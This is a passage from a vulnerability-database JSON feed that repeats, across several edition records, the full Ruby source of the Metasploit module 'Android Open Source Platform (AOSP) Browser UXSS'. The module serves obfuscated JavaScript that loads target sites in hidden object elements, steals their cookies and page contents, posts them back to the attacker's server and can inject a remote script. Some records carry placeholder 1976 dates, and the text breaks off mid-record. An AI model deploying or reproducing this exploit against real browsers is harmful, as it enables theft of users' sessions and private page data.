"published"], "edition": 22}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-28T11:49:17", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-28T11:49:17"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-28T11:49:17", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-03T14:46:27", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-03T14:46:27"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-03T14:46:27", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-03T18:04:21", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-03T18:04:21"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-03T18:04:21", "differentElements": ["modified", "published"], "edition": 25}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-07T10:14:19", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-07T10:14:19"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-07T10:14:19", "differentElements": ["modified", "published"], "edition": 26}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-07T14:12:19", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-07T14:12:19"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-07T14:12:19", "differentElements": ["modified", "published"], "edition": 27}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-09T10:13:15", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-09T10:13:15"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 